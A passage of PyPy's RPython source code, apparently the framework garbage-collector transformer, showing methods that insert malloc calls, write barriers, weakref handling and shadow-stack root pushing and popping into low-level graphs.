shadowstack.ShadowStackRootWalker(self)\n\n def consider_constant(self, TYPE, value):\n self.layoutbuilder.consider_constant(TYPE, value, self.gcdata.gc)\n\n #def get_type_id(self, TYPE):\n # this method is attached to the instance and redirects to\n # layoutbuilder.get_type_id().\n\n def special_funcptr_for_type(self, TYPE):\n return self.layoutbuilder.special_funcptr_for_type(TYPE)\n\n def gc_header_for(self, obj, needs_hash=False):\n hdr = self.gcdata.gc.gcheaderbuilder.header_of_object(obj)\n HDR = self.HDR\n withhash, flag = self.gcdata.gc.withhash_flag_is_in_field\n x = getattr(hdr, withhash)\n TYPE = lltype.typeOf(x)\n x = lltype.cast_primitive(lltype.Signed, x)\n if needs_hash:\n x |= flag # set the flag in the header\n else:\n x &= ~flag # clear the flag in the header\n x = lltype.cast_primitive(TYPE, x)\n setattr(hdr, withhash, x)\n return hdr\n\n def get_hash_offset(self, T):\n type_id = self.get_type_id(T)\n assert not self.gcdata.q_is_varsize(type_id)\n return self.gcdata.q_fixed_size(type_id)\n\n def finish_tables(self):\n group = self.layoutbuilder.close_table()\n log.info(\"assigned %s typeids\" % (len(group.members), ))\n log.info(\"added %s push/pop stack root instructions\" % (\n self.num_pushs, ))\n if self.write_barrier_ptr:\n log.info(\"inserted %s write barrier calls\" % (\n self.write_barrier_calls, ))\n if self.write_barrier_from_array_ptr:\n log.info(\"inserted %s write_barrier_from_array calls\" % (\n self.write_barrier_from_array_calls, ))\n\n # XXX because we call inputconst already in replace_malloc, we can't\n # modify the instance, we have to modify the 'rtyped instance'\n # instead. horrors. is there a better way?\n\n s_gcdata = self.translator.annotator.bookkeeper.immutablevalue(\n self.gcdata)\n r_gcdata = self.translator.rtyper.getrepr(s_gcdata)\n ll_instance = rmodel.inputconst(r_gcdata, self.gcdata).value\n\n addresses_of_static_ptrs = (\n self.layoutbuilder.addresses_of_static_ptrs_in_nongc +\n self.layoutbuilder.addresses_of_static_ptrs)\n log.info(\"found %s static roots\" % (len(addresses_of_static_ptrs), ))\n ll_static_roots_inside = lltype.malloc(lltype.Array(llmemory.Address),\n len(addresses_of_static_ptrs),\n immortal=True)\n\n for i in range(len(addresses_of_static_ptrs)):\n ll_static_roots_inside[i] = addresses_of_static_ptrs[i]\n ll_instance.inst_static_root_start = llmemory.cast_ptr_to_adr(ll_static_roots_inside) + llmemory.ArrayItemsOffset(lltype.Array(llmemory.Address))\n ll_instance.inst_static_root_nongcend = ll_instance.inst_static_root_start + llmemory.sizeof(llmemory.Address) * len(self.layoutbuilder.addresses_of_static_ptrs_in_nongc)\n ll_instance.inst_static_root_end = ll_instance.inst_static_root_start + llmemory.sizeof(llmemory.Address) * len(addresses_of_static_ptrs)\n newgcdependencies = []\n newgcdependencies.append(ll_static_roots_inside)\n ll_instance.inst_max_type_id = len(group.members)\n typeids_z = self.write_typeid_list()\n ll_typeids_z = lltype.malloc(rgc.ARRAY_OF_CHAR,\n len(typeids_z),\n immortal=True)\n for i in range(len(typeids_z)):\n ll_typeids_z[i] = typeids_z[i]\n ll_instance.inst_typeids_z = llmemory.cast_ptr_to_adr(ll_typeids_z)\n newgcdependencies.append(ll_typeids_z)\n return newgcdependencies\n\n def get_finish_tables(self):\n # We must first make sure that the type_info_group's members\n # are all followed. Do it repeatedly while new members show up.\n # Once it is really done, do finish_tables().\n seen = 0\n while seen < len(self.layoutbuilder.type_info_group.members):\n curtotal = len(self.layoutbuilder.type_info_group.members)\n yield self.layoutbuilder.type_info_group.members[seen:curtotal]\n seen = curtotal\n yield self.finish_tables()\n\n def write_typeid_list(self):\n \"\"\"write out the list of type ids together with some info\"\"\"\n from pypy.tool.udir import udir\n # XXX not ideal since it is not per compilation, but per run\n # XXX argh argh, this only gives the member index but not the\n # real typeid, which is a complete mess to obtain now...\n all_ids = self.layoutbuilder.id_of_type.items()\n all_ids = [(typeinfo.index, TYPE) for (TYPE, typeinfo) in all_ids]\n all_ids = dict(all_ids)\n f = udir.join(\"typeids.txt\").open(\"w\")\n for index in range(len(self.layoutbuilder.type_info_group.members)):\n f.write(\"member%-4d %s\\n\" % (index, all_ids.get(index, '?')))\n f.close()\n try:\n import zlib\n return zlib.compress(udir.join(\"typeids.txt\").read(), 9)\n except ImportError:\n return ''\n\n def transform_graph(self, graph):\n func = getattr(graph, 'func', None)\n if func and getattr(func, '_gc_no_collect_', False):\n if self.collect_analyzer.analyze_direct_call(graph):\n raise Exception(\"'no_collect' function can trigger collection:\"\n \" %s\" % func)\n \n if self.write_barrier_ptr:\n self.clean_sets = (\n find_initializing_stores(self.collect_analyzer, graph))\n if self.gcdata.gc.can_optimize_clean_setarrayitems():\n self.clean_sets = self.clean_sets.union(\n find_clean_setarrayitems(self.collect_analyzer, graph))\n super(FrameworkGCTransformer, self).transform_graph(graph)\n if self.write_barrier_ptr:\n self.clean_sets = None\n\n def gct_direct_call(self, hop):\n if self.collect_analyzer.analyze(hop.spaceop):\n livevars = self.push_roots(hop)\n self.default(hop)\n self.pop_roots(hop, livevars)\n else:\n self.default(hop)\n if hop.spaceop.opname == \"direct_call\":\n self.mark_call_cannotcollect(hop, hop.spaceop.args[0])\n\n def mark_call_cannotcollect(self, hop, name):\n pass\n\n gct_indirect_call = gct_direct_call\n\n def gct_fv_gc_malloc(self, hop, flags, TYPE, *args):\n op = hop.spaceop\n flavor = flags['flavor']\n\n PTRTYPE = op.result.concretetype\n assert PTRTYPE.TO == TYPE\n type_id = self.get_type_id(TYPE)\n\n c_type_id = rmodel.inputconst(TYPE_ID, type_id)\n info = self.layoutbuilder.get_info(type_id)\n c_size = rmodel.inputconst(lltype.Signed, info.fixedsize)\n kind_and_fptr = self.special_funcptr_for_type(TYPE)\n has_finalizer = (kind_and_fptr is not None and\n kind_and_fptr[0] == \"finalizer\")\n has_light_finalizer = (kind_and_fptr is not None and\n kind_and_fptr[0] == \"light_finalizer\")\n if has_light_finalizer:\n has_finalizer = True\n c_has_finalizer = rmodel.inputconst(lltype.Bool, has_finalizer)\n c_has_light_finalizer = rmodel.inputconst(lltype.Bool,\n has_light_finalizer)\n\n if not op.opname.endswith('_varsize') and not flags.get('varsize'):\n #malloc_ptr = self.malloc_fixedsize_ptr\n zero = flags.get('zero', False)\n if (self.malloc_fast_ptr is not None and\n not c_has_finalizer.value and\n (self.malloc_fast_is_clearing or not zero)):\n malloc_ptr = self.malloc_fast_ptr\n elif zero:\n malloc_ptr = self.malloc_fixedsize_clear_ptr\n else:\n malloc_ptr = self.malloc_fixedsize_ptr\n args = [self.c_const_gc, c_type_id, c_size,\n c_has_finalizer, c_has_light_finalizer,\n rmodel.inputconst(lltype.Bool, False)]\n else:\n assert not c_has_finalizer.value\n info_varsize = self.layoutbuilder.get_info_varsize(type_id)\n v_length = op.args[-1]\n c_ofstolength = rmodel.inputconst(lltype.Signed,\n info_varsize.ofstolength)\n c_varitemsize = rmodel.inputconst(lltype.Signed,\n info_varsize.varitemsize)\n if flags.get('nonmovable') and self.malloc_varsize_nonmovable_ptr:\n # we don't have tests for such cases, let's fail\n # explicitely\n malloc_ptr = self.malloc_varsize_nonmovable_ptr\n args = [self.c_const_gc, c_type_id, v_length]\n else:\n if self.malloc_varsize_clear_fast_ptr is not None:\n malloc_ptr = self.malloc_varsize_clear_fast_ptr\n else:\n malloc_ptr = self.malloc_varsize_clear_ptr\n args = [self.c_const_gc, c_type_id, v_length, c_size,\n c_varitemsize, c_ofstolength]\n livevars = self.push_roots(hop)\n v_result = hop.genop(\"direct_call\", [malloc_ptr] + args,\n resulttype=llmemory.GCREF)\n self.pop_roots(hop, livevars)\n return v_result\n\n gct_fv_gc_malloc_varsize = gct_fv_gc_malloc\n\n def gct_gc__collect(self, hop):\n op = hop.spaceop\n if len(op.args) == 1:\n v_gen = op.args[0]\n else:\n # pick a number larger than expected different gc gens :-)\n v_gen = rmodel.inputconst(lltype.Signed, 9)\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.collect_ptr, self.c_const_gc, v_gen],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_can_move(self, hop):\n op = hop.spaceop\n v_addr = hop.genop('cast_ptr_to_adr',\n [op.args[0]], resulttype=llmemory.Address)\n hop.genop(\"direct_call\", [self.can_move_ptr, self.c_const_gc, v_addr],\n resultvar=op.result)\n\n def gct_shrink_array(self, hop):\n if self.shrink_array_ptr is None:\n return GCTransformer.gct_shrink_array(self, hop)\n op = hop.spaceop\n v_addr = hop.genop('cast_ptr_to_adr',\n [op.args[0]], resulttype=llmemory.Address)\n v_length = op.args[1]\n hop.genop(\"direct_call\", [self.shrink_array_ptr, self.c_const_gc,\n v_addr, v_length],\n resultvar=op.result)\n\n def gct_gc_assume_young_pointers(self, hop):\n if not hasattr(self, 'assume_young_pointers_ptr'):\n return\n op = hop.spaceop\n v_addr = op.args[0]\n if v_addr.concretetype != llmemory.Address:\n v_addr = hop.genop('cast_ptr_to_adr',\n [v_addr], resulttype=llmemory.Address)\n hop.genop(\"direct_call\", [self.assume_young_pointers_ptr,\n self.c_const_gc, v_addr])\n\n def gct_gc_heap_stats(self, hop):\n if not hasattr(self, 'heap_stats_ptr'):\n return GCTransformer.gct_gc_heap_stats(self, hop)\n op = hop.spaceop\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.heap_stats_ptr, self.c_const_gc],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_get_member_index(self, hop):\n op = hop.spaceop\n v_typeid = op.args[0]\n hop.genop(\"direct_call\", [self.get_member_index_ptr, self.c_const_gc,\n v_typeid], resultvar=op.result)\n\n def _gc_adr_of_gc_attr(self, hop, attrname):\n if getattr(self.gcdata.gc, attrname, None) is None:\n raise NotImplementedError(\"gc_adr_of_%s only for generational gcs\"\n % (attrname,))\n op = hop.spaceop\n ofs = llmemory.offsetof(self.c_const_gc.concretetype.TO,\n 'inst_' + attrname)\n c_ofs = rmodel.inputconst(lltype.Signed, ofs)\n v_gc_adr = hop.genop('cast_ptr_to_adr', [self.c_const_gc],\n resulttype=llmemory.Address)\n hop.genop('adr_add', [v_gc_adr, c_ofs], resultvar=op.result)\n\n def gct_gc_adr_of_nursery_free(self, hop):\n self._gc_adr_of_gc_attr(hop, 'nursery_free')\n def gct_gc_adr_of_nursery_top(self, hop):\n self._gc_adr_of_gc_attr(hop, 'nursery_top')\n\n def _gc_adr_of_gcdata_attr(self, hop, attrname):\n op = hop.spaceop\n ofs = llmemory.offsetof(self.c_const_gcdata.concretetype.TO,\n 'inst_' + attrname)\n c_ofs = rmodel.inputconst(lltype.Signed, ofs)\n v_gcdata_adr = hop.genop('cast_ptr_to_adr', [self.c_const_gcdata],\n resulttype=llmemory.Address)\n hop.genop('adr_add', [v_gcdata_adr, c_ofs], resultvar=op.result)\n\n def gct_gc_adr_of_root_stack_base(self, hop):\n self._gc_adr_of_gcdata_attr(hop, 'root_stack_base')\n def gct_gc_adr_of_root_stack_top(self, hop):\n self._gc_adr_of_gcdata_attr(hop, 'root_stack_top')\n\n def gct_gc_shadowstackref_new(self, hop):\n op = hop.spaceop\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.root_walker.gc_shadowstackref_new_ptr],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_shadowstackref_context(self, hop):\n op = hop.spaceop\n hop.genop(\"direct_call\",\n [self.root_walker.gc_shadowstackref_context_ptr, op.args[0]],\n resultvar=op.result)\n\n def gct_gc_shadowstackref_destroy(self, hop):\n op = hop.spaceop\n hop.genop(\"direct_call\",\n [self.root_walker.gc_shadowstackref_destroy_ptr, op.args[0]])\n\n def gct_gc_save_current_state_away(self, hop):\n op = hop.spaceop\n hop.genop(\"direct_call\",\n [self.root_walker.gc_save_current_state_away_ptr,\n op.args[0], op.args[1]])\n\n def gct_gc_forget_current_state(self, hop):\n hop.genop(\"direct_call\",\n [self.root_walker.gc_forget_current_state_ptr])\n\n def gct_gc_restore_state_from(self, hop):\n op = hop.spaceop\n hop.genop(\"direct_call\",\n [self.root_walker.gc_restore_state_from_ptr,\n op.args[0]])\n\n def gct_gc_start_fresh_new_state(self, hop):\n hop.genop(\"direct_call\",\n [self.root_walker.gc_start_fresh_new_state_ptr])\n\n def gct_gc_x_swap_pool(self, hop):\n raise NotImplementedError(\"old operation deprecated\")\n def gct_gc_x_clone(self, hop):\n raise NotImplementedError(\"old operation deprecated\")\n def gct_gc_x_size_header(self, hop):\n raise NotImplementedError(\"old operation deprecated\")\n\n def gct_do_malloc_fixedsize_clear(self, hop):\n # used by the JIT (see pypy.jit.backend.llsupport.gc)\n op = hop.spaceop\n [v_typeid, v_size,\n v_has_finalizer, v_has_light_finalizer, v_contains_weakptr] = op.args\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\",\n [self.malloc_fixedsize_clear_ptr, self.c_const_gc,\n v_typeid, v_size,\n v_has_finalizer, v_has_light_finalizer,\n v_contains_weakptr],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_do_malloc_varsize_clear(self, hop):\n # used by the JIT (see pypy.jit.backend.llsupport.gc)\n op = hop.spaceop\n [v_typeid, v_length, v_size, v_itemsize,\n v_offset_to_length] = op.args\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\",\n [self.malloc_varsize_clear_ptr, self.c_const_gc,\n v_typeid, v_length, v_size, v_itemsize,\n v_offset_to_length],\n resultvar=op.result)\n self.pop_roots(hop, livevars)\n\n def gct_get_write_barrier_failing_case(self, hop):\n op = hop.spaceop\n hop.genop(\"same_as\",\n [self.write_barrier_failing_case_ptr],\n resultvar=op.result)\n\n def gct_get_write_barrier_from_array_failing_case(self, hop):\n op = hop.spaceop\n v = getattr(self, 'write_barrier_from_array_failing_case_ptr',\n lltype.nullptr(op.result.concretetype.TO))\n hop.genop(\"same_as\", [v], resultvar=op.result)\n\n def gct_zero_gc_pointers_inside(self, hop):\n if not self.malloc_zero_filled:\n v_ob = hop.spaceop.args[0]\n TYPE = v_ob.concretetype.TO\n gen_zero_gc_pointers(TYPE, v_ob, hop.llops)\n\n def gct_gc_writebarrier_before_copy(self, hop):\n op = hop.spaceop\n if not hasattr(self, 'wb_before_copy_ptr'):\n # no write barrier needed in that case\n hop.genop(\"same_as\",\n [rmodel.inputconst(lltype.Bool, True)],\n resultvar=op.result)\n return\n source_addr = hop.genop('cast_ptr_to_adr', [op.args[0]],\n resulttype=llmemory.Address)\n dest_addr = hop.genop('cast_ptr_to_adr', [op.args[1]],\n resulttype=llmemory.Address)\n hop.genop('direct_call', [self.wb_before_copy_ptr, self.c_const_gc,\n source_addr, dest_addr] + op.args[2:],\n resultvar=op.result)\n\n def gct_weakref_create(self, hop):\n op = hop.spaceop\n\n type_id = self.get_type_id(WEAKREF)\n\n c_type_id = rmodel.inputconst(TYPE_ID, type_id)\n info = self.layoutbuilder.get_info(type_id)\n c_size = rmodel.inputconst(lltype.Signed, info.fixedsize)\n malloc_ptr = self.malloc_fixedsize_ptr\n c_false = rmodel.inputconst(lltype.Bool, False)\n c_has_weakptr = rmodel.inputconst(lltype.Bool, True)\n args = [self.c_const_gc, c_type_id, c_size,\n c_false, c_false, c_has_weakptr]\n\n # push and pop the current live variables *including* the argument\n # to the weakref_create operation, which must be kept alive and\n # moved if the GC needs to collect\n livevars = self.push_roots(hop, keep_current_args=True)\n v_result = hop.genop(\"direct_call\", [malloc_ptr] + args,\n resulttype=llmemory.GCREF)\n v_result = hop.genop(\"cast_opaque_ptr\", [v_result],\n resulttype=WEAKREFPTR)\n self.pop_roots(hop, livevars)\n # cast_ptr_to_adr must be done after malloc, as the GC pointer\n # might have moved just now.\n v_instance, = op.args\n v_addr = hop.genop(\"cast_ptr_to_adr\", [v_instance],\n resulttype=llmemory.Address)\n hop.genop(\"bare_setfield\",\n [v_result, rmodel.inputconst(lltype.Void, \"weakptr\"), v_addr])\n v_weakref = hop.genop(\"cast_ptr_to_weakrefptr\", [v_result],\n resulttype=llmemory.WeakRefPtr)\n hop.cast_result(v_weakref)\n\n def gct_weakref_deref(self, hop):\n v_wref, = hop.spaceop.args\n v_addr = hop.genop(\"direct_call\",\n [self.weakref_deref_ptr, v_wref],\n resulttype=llmemory.Address)\n hop.cast_result(v_addr)\n\n def gct_gc_identityhash(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n v_ptr = hop.genop(\"cast_opaque_ptr\", [v_ptr],\n resulttype=llmemory.GCREF)\n hop.genop(\"direct_call\",\n [self.identityhash_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_id(self, hop):\n if self.id_ptr is not None:\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n v_ptr = hop.genop(\"cast_opaque_ptr\", [v_ptr],\n resulttype=llmemory.GCREF)\n hop.genop(\"direct_call\", [self.id_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n else:\n hop.rename('cast_ptr_to_int') # works nicely for non-moving GCs\n\n def gct_gc_obtain_free_space(self, hop):\n livevars = self.push_roots(hop)\n [v_number] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.obtainfreespace_ptr, self.c_const_gc, v_number],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_set_max_heap_size(self, hop):\n [v_size] = hop.spaceop.args\n hop.genop(\"direct_call\", [self.set_max_heap_size_ptr,\n self.c_const_gc,\n v_size])\n\n def gct_gc_thread_prepare(self, hop):\n pass # no effect any more\n\n def gct_gc_thread_run(self, hop):\n assert self.translator.config.translation.thread\n if hasattr(self.root_walker, 'thread_run_ptr'):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.root_walker.thread_run_ptr])\n self.pop_roots(hop, livevars)\n\n def gct_gc_thread_start(self, hop):\n assert self.translator.config.translation.thread\n if hasattr(self.root_walker, 'thread_start_ptr'):\n # only with asmgcc. Note that this is actually called after\n # the first gc_thread_run() in the new thread.\n hop.genop(\"direct_call\", [self.root_walker.thread_start_ptr])\n\n def gct_gc_thread_die(self, hop):\n assert self.translator.config.translation.thread\n if hasattr(self.root_walker, 'thread_die_ptr'):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.root_walker.thread_die_ptr])\n self.pop_roots(hop, livevars)\n\n def gct_gc_thread_before_fork(self, hop):\n if (self.translator.config.translation.thread\n and hasattr(self.root_walker, 'thread_before_fork_ptr')):\n hop.genop(\"direct_call\", [self.root_walker.thread_before_fork_ptr],\n resultvar=hop.spaceop.result)\n else:\n c_null = rmodel.inputconst(llmemory.Address, llmemory.NULL)\n hop.genop(\"same_as\", [c_null],\n resultvar=hop.spaceop.result)\n\n def gct_gc_thread_after_fork(self, hop):\n if (self.translator.config.translation.thread\n and hasattr(self.root_walker, 'thread_after_fork_ptr')):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\", [self.root_walker.thread_after_fork_ptr]\n + hop.spaceop.args)\n self.pop_roots(hop, livevars)\n\n def gct_gc_get_type_info_group(self, hop):\n return hop.cast_result(self.c_type_info_group)\n\n def gct_gc_get_rpy_roots(self, hop):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\",\n [self.get_rpy_roots_ptr, self.c_const_gc],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_get_rpy_referents(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.get_rpy_referents_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_get_rpy_memory_usage(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.get_rpy_memory_usage_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_get_rpy_type_index(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.get_rpy_type_index_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_is_rpy_instance(self, hop):\n livevars = self.push_roots(hop)\n [v_ptr] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.is_rpy_instance_ptr, self.c_const_gc, v_ptr],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_dump_rpy_heap(self, hop):\n livevars = self.push_roots(hop)\n [v_fd] = hop.spaceop.args\n hop.genop(\"direct_call\",\n [self.dump_rpy_heap_ptr, self.c_const_gc, v_fd],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_gc_typeids_z(self, hop):\n livevars = self.push_roots(hop)\n hop.genop(\"direct_call\",\n [self.get_typeids_z_ptr, self.c_const_gc],\n resultvar=hop.spaceop.result)\n self.pop_roots(hop, livevars)\n\n def gct_malloc_nonmovable_varsize(self, hop):\n TYPE = hop.spaceop.result.concretetype\n if self.gcdata.gc.can_malloc_nonmovable():\n return self.gct_malloc_varsize(hop, {'nonmovable':True})\n c = rmodel.inputconst(TYPE, lltype.nullptr(TYPE.TO))\n return hop.cast_result(c)\n\n def gct_malloc_nonmovable(self, hop):\n TYPE = hop.spaceop.result.concretetype\n if self.gcdata.gc.can_malloc_nonmovable():\n return self.gct_malloc(hop, {'nonmovable':True})\n c = rmodel.inputconst(TYPE, lltype.nullptr(TYPE.TO))\n return hop.cast_result(c)\n\n def _set_into_gc_array_part(self, op):\n if op.opname == 'setarrayitem':\n return op.args[1]\n if op.opname == 'setinteriorfield':\n for v in op.args[1:-1]:\n if v.concretetype is not lltype.Void:\n return v\n return None\n\n def transform_generic_set(self, hop):\n from pypy.objspace.flow.model import Constant\n opname = hop.spaceop.opname\n v_struct = hop.spaceop.args[0]\n v_newvalue = hop.spaceop.args[-1]\n assert opname in ('setfield', 'setarrayitem', 'setinteriorfield')\n assert isinstance(v_newvalue.concretetype, lltype.Ptr)\n # XXX for some GCs the skipping if the newvalue is a constant won't be\n # ok\n if (self.write_barrier_ptr is not None\n and not isinstance(v_newvalue, Constant)\n and v_struct.concretetype.TO._gckind == \"gc\"\n and hop.spaceop not in self.clean_sets):\n v_newvalue = hop.genop(\"cast_ptr_to_adr\", [v_newvalue],\n resulttype = llmemory.Address)\n v_structaddr = hop.genop(\"cast_ptr_to_adr\", [v_struct],\n resulttype = llmemory.Address)\n if (self.write_barrier_from_array_ptr is not None and\n self._set_into_gc_array_part(hop.spaceop) is not None):\n self.write_barrier_from_array_calls += 1\n v_index = self._set_into_gc_array_part(hop.spaceop)\n assert v_index.concretetype == lltype.Signed\n hop.genop(\"direct_call\", [self.write_barrier_from_array_ptr,\n self.c_const_gc,\n v_newvalue,\n v_structaddr,\n v_index])\n else:\n self.write_barrier_calls += 1\n hop.genop(\"direct_call\", [self.write_barrier_ptr,\n self.c_const_gc,\n v_newvalue,\n v_structaddr])\n hop.rename('bare_' + opname)\n\n def transform_getfield_typeptr(self, hop):\n # this would become quite a lot of operations, even if it compiles\n # to C code that is just as efficient as \"obj->typeptr\". To avoid\n # that, we just generate a single custom operation instead.\n hop.genop('gc_gettypeptr_group', [hop.spaceop.args[0],\n self.c_type_info_group,\n self.c_vtinfo_skip_offset,\n self.c_vtableinfo],\n resultvar = hop.spaceop.result)\n\n def transform_setfield_typeptr(self, hop):\n # replace such a setfield with an assertion that the typeptr is right\n # (xxx not very useful right now, so disabled)\n if 0:\n v_new = hop.spaceop.args[2]\n v_old = hop.genop('gc_gettypeptr_group', [hop.spaceop.args[0],\n self.c_type_info_group,\n self.c_vtinfo_skip_offset,\n self.c_vtableinfo],\n resulttype = v_new.concretetype)\n v_eq = hop.genop(\"ptr_eq\", [v_old, v_new],\n resulttype = lltype.Bool)\n c_errmsg = rmodel.inputconst(lltype.Void,\n \"setfield_typeptr: wrong type\")\n hop.genop('debug_assert', [v_eq, c_errmsg])\n\n def gct_getfield(self, hop):\n if (hop.spaceop.args[1].value == 'typeptr' and\n hop.spaceop.args[0].concretetype.TO._hints.get('typeptr') and\n self.translator.config.translation.gcremovetypeptr):\n self.transform_getfield_typeptr(hop)\n else:\n GCTransformer.gct_getfield(self, hop)\n\n def gct_setfield(self, hop):\n if (hop.spaceop.args[1].value == 'typeptr' and\n hop.spaceop.args[0].concretetype.TO._hints.get('typeptr') and\n self.translator.config.translation.gcremovetypeptr):\n self.transform_setfield_typeptr(hop)\n else:\n GCTransformer.gct_setfield(self, hop)\n\n def var_needs_set_transform(self, var):\n return var_needsgc(var)\n\n def push_alive_nopyobj(self, var, llops):\n pass\n\n def pop_alive_nopyobj(self, var, llops):\n pass\n\n def get_livevars_for_roots(self, hop, keep_current_args=False):\n if self.gcdata.gc.moving_gc and not keep_current_args:\n # moving GCs don't borrow, so the caller does not need to keep\n # the arguments alive\n livevars = [var for var in hop.livevars_after_op()\n if not var_ispyobj(var)]\n else:\n livevars = hop.livevars_after_op() + hop.current_op_keeps_alive()\n livevars = [var for var in livevars if not var_ispyobj(var)]\n return livevars\n\n def push_roots(self, hop, keep_current_args=False):\n if self.incr_stack_ptr is None:\n return\n livevars = self.get_livevars_for_roots(hop, keep_current_args)\n self.num_pushs += len(livevars)\n if not livevars:\n return []\n c_len = rmodel.inputconst(lltype.Signed, len(livevars) )\n base_addr = hop.genop(\"direct_call\", [self.incr_stack_ptr, c_len ],\n resulttype=llmemory.Address)\n c_type = rmodel.inputconst(lltype.Void, llmemory.Address)\n for k,var in enumerate(livevars):\n c_k = rmodel.inputconst(lltype.Signed, k)\n v_adr = gen_cast(hop.llops, llmemory.Address, var)\n hop.genop(\"raw_store\", [base_addr, c_type, c_k, v_adr])\n return livevars\n\n def pop_roots(self, hop, livevars):\n if self.decr_stack_ptr is None:\n return\n if not livevars:\n return\n c_len = rmodel.inputconst(lltype.Signed, len(livevars) )\n base_addr = hop.genop(\"direct_call\", [self.decr_stack_ptr, c_len ],\n resulttype=llmemory.Address)\n if self.gcdata.gc.moving_gc:\n # for moving collectors, reload the roots into the local variables\n c_type = rmodel.inputconst(lltype.Void, llmemory.Address)\n for k,var in enumerate(livevars):\n c_k = rmodel.inputconst(lltype.Signed, k)\n v_newaddr = hop.genop(\"raw_load\", [base_addr, c_type, c_k],\n resulttype=llmemory.Address)\n hop.genop(\"gc_reload_possibly_moved\", [v_newaddr, var])\n\n def compute_borrowed_vars(self, graph):\n # XXX temporary workaround, should be done more correctly\n if self.gcdata.gc.moving_gc:\n return lambda v: False\n return super(FrameworkGCTransformer, self).compute_borrowed_vars(graph)\n\n\nclass TransformerLayoutBuilder(gctypelayout.TypeLayoutBuilder):\n\n def __init__(self, translator, GCClass=None):\n if GCClass is None:\n from pypy.rpython.memory.gc.base import choose_gc_from_config\n GCClass, _ = choose_gc_from_config(translator.config)\n if translator.config.translation.gcremovetypeptr:\n lltype2vtable = translator.rtyper.lltype2vtable\n else:\n lltype2vtable = None\n self.translator = translator\n super(TransformerLayoutBuilder, self).__init__(GCClass, lltype2vtable)\n\n def has_finalizer(self, TYPE):\n rtti = get_rtti(TYPE)\n return rtti is not None and getattr(rtti._obj, 'destructor_funcptr',\n None)\n\n def has_light_finalizer(self, TYPE):\n special = self.special_funcptr_for_type(TYPE)\n return special is not None and special[0] == 'light_finalizer'\n\n def has_custom_trace(self, TYPE):\n rtti = get_rtti(TYPE)\n return rtti is not None and getattr(rtti._obj, 'custom_trace_funcptr',\n None)\n\n def make_finalizer_funcptr_for_type(self, TYPE):\n if not self.has_finalizer(TYPE):\n return None, False\n rtti = get_rtti(TYPE)\n destrptr = rtti._obj.destructor_funcptr\n DESTR_ARG = lltype.typeOf(destrptr).TO.ARGS[0]\n assert not type_contains_pyobjs(TYPE), \"not implemented\"\n typename = TYPE.__name__\n def ll_finalizer(addr, ignored):\n v = llmemory.cast_adr_to_ptr(addr, DESTR_ARG)\n ll_call_destructor(destrptr, v, typename)\n return llmemory.NULL\n fptr = self.transformer.annotate_finalizer(ll_finalizer,\n [llmemory.Address, llmemory.Address], llmemory.Address)\n g = destrptr._obj.graph\n light = not FinalizerAnalyzer(self.translator).analyze_light_finalizer(g)\n return fptr, light\n\n def make_custom_trace_funcptr_for_type(self, TYPE):\n if not self.has_custom_trace(TYPE):\n return None\n rtti = get_rtti(TYPE)\n fptr = rtti._obj.custom_trace_funcptr\n if not hasattr(fptr._obj, 'graph'):\n ll_func = fptr._obj._callable\n fptr = self.transformer.annotate_finalizer(ll_func,\n [llmemory.Address, llmemory.Address], llmemory.Address)\n return fptr\n\n\ndef gen_zero_gc_pointers(TYPE, v, llops, previous_steps=None):\n if previous_steps is None:\n previous_steps = []\n assert isinstance(TYPE, lltype.Struct)\n for name in TYPE._names:\n c_name = rmodel.inputconst(lltype.Void, name)\n FIELD = getattr(TYPE, name)\n if isinstance(FIELD, lltype.Ptr) and FIELD._needsgc():\n c_null = rmodel.inputconst(FIELD, lltype.nullptr(FIELD.TO))\n if not previous_steps:\n llops.genop('bare_setfield', [v, c_name, c_null])\n else:\n llops.genop('bare_setinteriorfield',\n [v] + previous_steps + [c_name, c_null])\n elif isinstance(FIELD, lltype.Struct):\n gen_zero_gc_pointers(FIELD, v, llops, previous_steps + [c_name])\n\n# ____________________________________________________________\n\n\nsizeofaddr = llmemory.sizeof(llmemory.Address)\n\n\nclass BaseRootWalker(object):\n need_root_stack = False\n thread_setup = None\n\n def __init__(self, gctransformer):\n self.gcdata = gctransformer.gcdata\n self.gc = self.gcdata.gc\n\n def _freeze_(self):\n return True\n\n def setup_root_walker(self):\n if self.thread_setup is not None:\n 